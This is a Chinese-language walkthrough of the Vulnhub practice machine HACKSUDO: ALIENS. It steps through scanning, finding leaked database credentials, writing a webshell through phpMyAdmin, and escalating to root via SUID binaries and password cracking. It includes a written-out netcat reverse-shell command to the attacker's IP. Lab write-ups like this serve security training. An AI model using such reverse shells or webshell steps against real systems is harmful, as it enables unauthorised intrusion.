1. 程式人生 > 其它 >Vulnhub 靶場 HACKSUDO: ALIENS

Vulnhub 靶場 HACKSUDO: ALIENS

前期準備:

靶機地址:https://www.vulnhub.com/entry/hacksudo-aliens,676/

kali攻擊機ip:192.168.11.128
靶機ip:192.168.11.145

一、資訊收集

1.使用nmap對目標靶機進行掃描

開了 22、80、9000埠。

2. 80埠

是一些關於目擊外星人的資料,檢視原始碼也沒發現什麼,掃一下目錄:

發現個遊戲:

不用怎麼動就能通關,不過通關了也沒發現什麼,看一下 /backup 目錄:

發現個 mysql.bak 檔案,下載下來檢視:

發現了資料庫的使用者名稱和密碼:

user="vishal"
password="hacksudo"

3. 9000埠

nmap掃的時候發現有 robots.txt 檔案:

什麼也沒有,用上面的使用者名稱密碼直接登入phpmyadmin:

二、漏洞利用

檢視可用的資訊:

有使用者和密碼的hash值,不過用不了,那就利用sql語句寫入一句話木馬:

GO 執行後訪問:

一句話木馬寫入成功,然後獲取反彈 shell,檢視是否有 nc:

利用 nc 反彈 shell並本地監聽:

nc -e /bin/bash 192.168.11.128 1234

nc 連線成功,升級一下 shell

三、提權

檢視檔案沒發現什麼,檢視許可權和SUID檔案:

發現可以用 date,date 可以越權檢視檔案:

得到了 root 和 hacksudo 的密碼 hash,複製下來用 john 暴破一下:

root的密碼短時間沒有爆出來,hacksudo的密碼一下就出來了:aliens,那就 ssh 登入:

檢視許可權和 SUID 檔案:

有個二進位制檔案比較可疑。檢視一下:

在 gtfobins 上找到了它的提權方式:

提權到 root:

檢視 flag:

完成。